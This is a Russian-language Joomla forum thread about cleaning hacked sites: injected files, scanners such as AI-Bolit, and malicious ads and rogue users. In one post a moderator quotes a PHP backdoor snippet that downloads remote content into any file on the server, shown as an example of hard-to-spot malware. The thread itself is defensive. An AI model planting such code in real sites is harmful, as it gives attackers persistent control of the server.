Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 792 Ответов
  • 290708 Просмотров
*

himyra

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Так все файлы Joomla перезалей, кроме папки /installation
Код
a.php и movie.php нету.
ищи в других папках
Заменял файлы как вы и написали,  файлы a.php и movie.php  сканировал полностью всю директорию с сайтом.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
ссылку на сайт ? дай доступ в личку, после 10 сообщений сможешь писать
*

himyra

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
ссылку на сайт ? дай доступ в личку, после 10 сообщений сможешь писать
Хорошо
*

Nats

  • Осваиваюсь на форуме
  • 12
  • 2 / 0
Кстати, файлы a.php и movie.php айболитом не сосканились. Лежали у меня в папке components.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Встречаются и такие дописки и другие более короткие, которые найти можно только просмотром файлов.

Код
if (@$_GET['a']==5) {exit('17');}
if (!empty($_GET['z']) && !empty($_GET['id']))
{
if (!$handle = fopen($_GET['z'], 'a')) {exit;}
if (fwrite($handle, file_get_contents($_GET['id'])) === FALSE) {exit;}
fclose($handle);
exit('OK');
}

варианты бывают разные и интересные...
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Кстати, файлы a.php и movie.php айболитом не сосканились. Лежали у меня в папке components.
Я нашел руками, а потом спецом не удалял, решил проверить айболит- обнаружил.
папка та же.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
@draff
код какой в них, думаю это старые файлы по памяти с рост, евал или куки, они всеми сканерами сканируются
*

Funaki

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
тоже нарвался на эти файлы ещё бывает gif.php
Кстати, файлы a.php и movie.php айболитом не сосканились. Лежали у меня в папке components.
  • а никто не знает через какую уязвимость заливают эти файлы?
  • никак не могу найти куда встраивают вызов этих файлов - подскажите где?
  • и какой в них заложен вред?
(как мне кажется только редирект или стоит прошерстить на предмет ссылок)?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
1. через какую уязвимость? через уязвимые компоненты установленные у вас либо через протроянивание ПК
2. как вариант в системную функцию! самой CMS т.е становится частью CMS.
3. Первая, что вы отписались здесь! вторая, что может песемезироваит вашь сайт перед ПС и вы утратит трафик!, третье что можно песемезировать ваш сайт в результатах сторонней рекламы и протрояневать ваших посетителей, в результате чего ваш сайт со временем начнет занимать нисшие позиции и станет для вас бесполезным!
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
Люди добрые, нужна помощь, открыл сегодня свой сайт не привычным браузером (firefox) и обнаружил ужасающую картину
Спойлер
[свернуть]
Как называются эти жуткие картинки и как от них избавиться? И почему вообще я их вижу только в Firefox, оч странно?
« Последнее редактирование: 08.07.2014, 19:07:16 от Alex Kop »
*

wishlight

  • Гуру
  • 5071
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Походу под юзер-агент сделали.
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
И видимо эта реклама у меня на сайте уже давно.
Я так подозреваю проблемы вот в этих файлах
Спойлер
[свернуть]
Подскажите, чего делать то с ними и как найти лазеку через которую они проникли?
*

wishlight

  • Гуру
  • 5071
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Попробуйте скрипт айболит. Хотя наверно проблема не там, но может и там. Или воспользуйтесь сканером ssf из этой темы.
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
Попробуйте скрипт айболит.
Так я в предидущем посте результаты из айболита и выложил и еще вот критические замечания
Спойлер
[свернуть]
тоже с папкой fof, она вообще какаято подозрительная, при попытке скопировать ее выходит ошибка копирования, более того рядом с ней есть папка fOf, думаю попробовать удалить их вообщее...)
*

wishlight

  • Гуру
  • 5071
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
 и реклама вроде отвалилась
((отвалилась не надолго...
вобщем попытка удаления папок провалилась
« Последнее редактирование: 08.07.2014, 22:15:15 от Alex Kop »
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
Или воспользуйтесь сканером ssf из этой темы
Сума сойти, я отметил только файлы htaccess, txt, php, phtml и у меня целый список файлов (штук наверно 300) с которыми не понятно, что делать, в этом вообще реально разобраться человеку который не шарит в php? Или это тонкий намек)
*

wishlight

  • Гуру
  • 5071
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Все таки придется с этим разбираться. Почти все доступные инструменты для очистки есть на форуме. Могу только что-то подсказать.
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
Подскажите как востановить АкибаБэкап, после удаления папки fof стала появляться ошибка 500 при запуске, копирование обратно папки не помогло, после деинсталяции и новой установки белый экран (отображение ошибок включено) при нажатии на Акибу.
« Последнее редактирование: 09.07.2014, 11:27:18 от Alex Kop »
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
Благодарствую всех откликнувшихся, благо хостинг клевый, техподдержка как всегда выручила оперативно.
*

herr

  • Захожу иногда
  • 127
  • 0 / 1
Всем добрый день!
Есть простой со статическим содержимым очень маленький сайт (5страниц).
Недавно зайдя в базу данных, обнаружил что таблиц в базе нет, но сайт работает. И ещё обнаружился новый пользователь, хотя регистрации на сайте нет. Этого пользователя я сразу удалил.
Вопрос такой, если таблиц нет но сайт работает, значит есть где то перенаправление, как найти и где искать.
Пока писал здесь, появилось при заходе на сайт и панель управления вот это: Error displaying the error page: Application Instantiation Error: Could not connect to MySQL.
*

herr

  • Захожу иногда
  • 127
  • 0 / 1
В конфиг файле нашёл вот такие записи
   public $memcache_persist = '1';
   public $memcache_compress = '0';
   public $memcache_server_host = 'localhost';
   public $memcache_server_port = '11211';
   public $memcached_persist = '1';
   public $memcached_compress = '0';
   public $memcached_server_host = 'localhost';
   public $memcached_server_port = '11211';
   public $session_memcache_server_host = 'localhost';
   public $session_memcache_server_port = '11211';
   public $session_memcached_server_host = 'localhost';
   public $session_memcached_server_port = '11211';
   public $frontediting = '1';
        public $asset_id = '1';
   public $proxy_enable = '0';
   public $proxy_host = '';
   public $proxy_port = '';
   public $proxy_user = '';
   public $proxy_pass = '';
« Последнее редактирование: 18.07.2014, 21:18:51 от herr »
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Всем добрый день!
Есть простой со статическим содержимым очень маленький сайт (5страниц).
Недавно зайдя в базу данных, обнаружил что таблиц в базе нет,

Лучше тогда начать по новой.
*

herr

  • Захожу иногда
  • 127
  • 0 / 1
я почти так и сделал, проверил весь сайт скриптом ssf  и ai-bolit, но ничего странного не нашёл (как мне показалось).
Взял базу из бэкапа и залил. И по ходу сменил все пароли.
Просто интересно откуда мог взяться пользователь. Стоит зашита от admin tools и стоит rs firewall последний.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
я почти так и сделал, проверил весь сайт скриптом ssf  и ai-bolit, но ничего странного не нашёл (как мне показалось).
Взял базу из бэкапа и залил. И по ходу сменил все пароли.
Просто интересно откуда мог взяться пользователь. Стоит зашита от admin tools и стоит rs firewall последний.
Может у вас проблемный хостинг?
*

bob2005

  • Осваиваюсь на форуме
  • 18
  • 1 / 0

Подскажите стоит ли очковать?
Спойлер
[свернуть]
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
нет, практически это "ежедневная жизнь сайта", просто таких ботов надо хотя бы по IP блокировать, ну и закрывать все возможное и вовремя обновляться
*

herr

  • Захожу иногда
  • 127
  • 0 / 1
Цитировать
Может у вас проблемный хостинг?

от IHC
*

zayzau86

  • Осваиваюсь на форуме
  • 48
  • 1 / 0
здравствуйте,
пытаюсь чистить сайт по инструкциям из сети, и вот возник вопрос,
ищу файлы в тотал командере по фразе "base64_decode", есть фразы с закодированным текстом - ссылками, а есть "base64_decode", а есть такого типа как в спойлере. в PHP не силен поэтому и спрашиваю стоит ли не них обращать внимание?
Код
// check for return URL from the request first
if ($return = JRequest::getVar('return', '', 'method', 'base64')) {
$return = base64_decode($return);
if (!JURI::isInternal($return)) {
$return = '';
}
}
спасибо!
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
от IHC
Иногда проблемы с безопасностью есть.
есть фразы с закодированным текстом - ссылками, а есть "base64_decode", а есть такого типа как в спойлере. в PHP не силен поэтому и спрашиваю стоит ли не них обращать внимание?
Ищешь  в чистом дистре этот же файл, и сравниваешь.Нашел отличие-заменил файл.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 2388
Последний ответ 14.02.2024, 13:15:59
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 70771
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 3366
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 5037
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 3456
Последний ответ 22.02.2022, 11:38:15
от AlexP750